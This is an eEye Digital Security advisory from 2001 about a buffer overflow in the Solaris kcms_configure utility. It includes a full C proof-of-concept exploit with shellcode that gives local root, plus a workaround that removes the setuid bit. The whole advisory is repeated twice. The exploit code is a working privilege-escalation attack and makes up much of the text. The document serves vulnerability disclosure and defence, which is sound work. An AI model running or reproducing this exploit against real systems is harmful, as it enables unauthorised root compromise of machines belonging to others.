Advisories
Solaris kcms_configure vulnerability
Release Date:
April 9, 2001
Severity:
Local Root Compromise
Vendor:
Sun Microsystems
Systems Affected:
Solaris 7/8 (x86 and sparc)
Versions prior are also most likely affected
Overview:
It was another long day at eEye where the beer was once again cold but eEye Wudan member Riley decided it was time to do some Solaris spring cleaning. This is the first of a few advisories to be released on various Solaris bugs that were laying around needing to be cleaned out.
We have discovered a buffer overflow in the kcms_configure utility provided with Solaris 7. The problem exists in the parsing of command line options. By exploiting this vulnerability an attacker can achieve local root privileges. The Kodak Color Management System (KCMS) packages have contained many vulnerabilities in the past, we recommend disabling them if you are not currently using them.
Technical Details:
Proof of Concept:
/*
Command line argument overflow
/usr/openwin/bin/kcms_configure
Proof of Concept Exploitation
Riley Hassell of eEye Digital Security
*/
#include
#include
#include
#include
#define BUFLEN 1100
/* seteuid/exec shellcode */
char shell[] =
"\xeb\x0a\x9a\x01\x02\x03\x5c\x07\x04\xc3\xeb\x05\xe8\xf9\xff\xff\xff"
"\x5e\x29\xc0\x88\x46\xf7\x89\x46\xf2\x50\xb0\x8d\xe8\xe0\xff\xff\xff"
"\x29\xc0\x50\xb0\x17\xe8\xd6\xff\xff\xff\xeb\x1f\x5e\x8d\x1e\x89\x5e"
"\x0b\x29\xc0\x88\x46\x19\x89\x46\x14\x89\x46\x0f\x89\x46\x07\xb0"
"\x3b\x8d\x4e\x0b\x51\x51\x53\x50\xeb\x18\xe8\xdc\xff\xff\xff\x2f\x62"
"\x69\x6e\x2f\x73\x68\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03"
"\x03\x9a\x04\x04\x04\x04\x07\x04";
char buf[BUFLEN];
unsigned long int nop, esp;
long int offset = 0;
unsigned long int get_esp() { __asm__("movl %esp,%eax");}
int main (int argc, char *argv[])
{
int i;
if (argc > 1)
offset = strtol(argv[1], NULL, 0);
else
offset = -300;
nop = 600;
esp = get_esp();
memset(buf, 0x90, BUFLEN);
memcpy(buf+600, shell, strlen(shell));
for (i = nop+strlen(shell)+1; i <= BUFLEN-4; i += 4)
*((int *) &buf[i]) = esp+offset;
buf[BUFLEN-1] = '\0';
execl("/usr/openwin/bin/kcms_configure", "eEye", "-o","-S","X",buf,NULL);
return;
}
Vendor Status:
Sun Microsystems has been contacted. They are currently working on patches for this and other related vulnerabilities eEye has discovered. We would like to thank them for working with us on creating a patch for this vulnerability.
Workaround:
chmod –s /usr/openwin/bin/kcms_configure
This will remove the setuid bit from kcms_configure, therefore if someone does exploit this vulnerability, they won’t gain higher privileges.
Credit:
Riley Hassell
Greetings:
ADM, Ryan “shellcode ninja” Permeh, KAM, Lamagra, Zen-Parse, and last but not least… all the kick ass people at Speakeasy.net.
Copyright (c) 1998-2009 eEye Digital Security
Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please email alert@eEye.com for permission.
Disclaimer
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.
April 9, 2001
Severity:
Local Root Compromise
Vendor:
Sun Microsystems
Systems Affected:
Solaris 7/8 (x86 and sparc)
Versions prior are also most likely affected
Overview:
It was another long day at eEye where the beer was once again cold but eEye Wudan member Riley decided it was time to do some Solaris spring cleaning. This is the first of a few advisories to be released on various Solaris bugs that were laying around needing to be cleaned out.
We have discovered a buffer overflow in the kcms_configure utility provided with Solaris 7. The problem exists in the parsing of command line options. By exploiting this vulnerability an attacker can achieve local root privileges. The Kodak Color Management System (KCMS) packages have contained many vulnerabilities in the past, we recommend disabling them if you are not currently using them.
Technical Details:
Proof of Concept:
/*
Command line argument overflow
/usr/openwin/bin/kcms_configure
Proof of Concept Exploitation
Riley Hassell of eEye Digital Security
*/
#include
#include
#include
#include
#define BUFLEN 1100
/* seteuid/exec shellcode */
char shell[] =
"\xeb\x0a\x9a\x01\x02\x03\x5c\x07\x04\xc3\xeb\x05\xe8\xf9\xff\xff\xff"
"\x5e\x29\xc0\x88\x46\xf7\x89\x46\xf2\x50\xb0\x8d\xe8\xe0\xff\xff\xff"
"\x29\xc0\x50\xb0\x17\xe8\xd6\xff\xff\xff\xeb\x1f\x5e\x8d\x1e\x89\x5e"
"\x0b\x29\xc0\x88\x46\x19\x89\x46\x14\x89\x46\x0f\x89\x46\x07\xb0"
"\x3b\x8d\x4e\x0b\x51\x51\x53\x50\xeb\x18\xe8\xdc\xff\xff\xff\x2f\x62"
"\x69\x6e\x2f\x73\x68\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03"
"\x03\x9a\x04\x04\x04\x04\x07\x04";
char buf[BUFLEN];
unsigned long int nop, esp;
long int offset = 0;
unsigned long int get_esp() { __asm__("movl %esp,%eax");}
int main (int argc, char *argv[])
{
int i;
if (argc > 1)
offset = strtol(argv[1], NULL, 0);
else
offset = -300;
nop = 600;
esp = get_esp();
memset(buf, 0x90, BUFLEN);
memcpy(buf+600, shell, strlen(shell));
for (i = nop+strlen(shell)+1; i <= BUFLEN-4; i += 4)
*((int *) &buf[i]) = esp+offset;
buf[BUFLEN-1] = '\0';
execl("/usr/openwin/bin/kcms_configure", "eEye", "-o","-S","X",buf,NULL);
return;
}
Vendor Status:
Sun Microsystems has been contacted. They are currently working on patches for this and other related vulnerabilities eEye has discovered. We would like to thank them for working with us on creating a patch for this vulnerability.
Workaround:
chmod –s /usr/openwin/bin/kcms_configure
This will remove the setuid bit from kcms_configure, therefore if someone does exploit this vulnerability, they won’t gain higher privileges.
Credit:
Riley Hassell
Greetings:
ADM, Ryan “shellcode ninja” Permeh, KAM, Lamagra, Zen-Parse, and last but not least… all the kick ass people at Speakeasy.net.
Copyright (c) 1998-2009 eEye Digital Security
Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please email alert@eEye.com for permission.
Disclaimer
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.
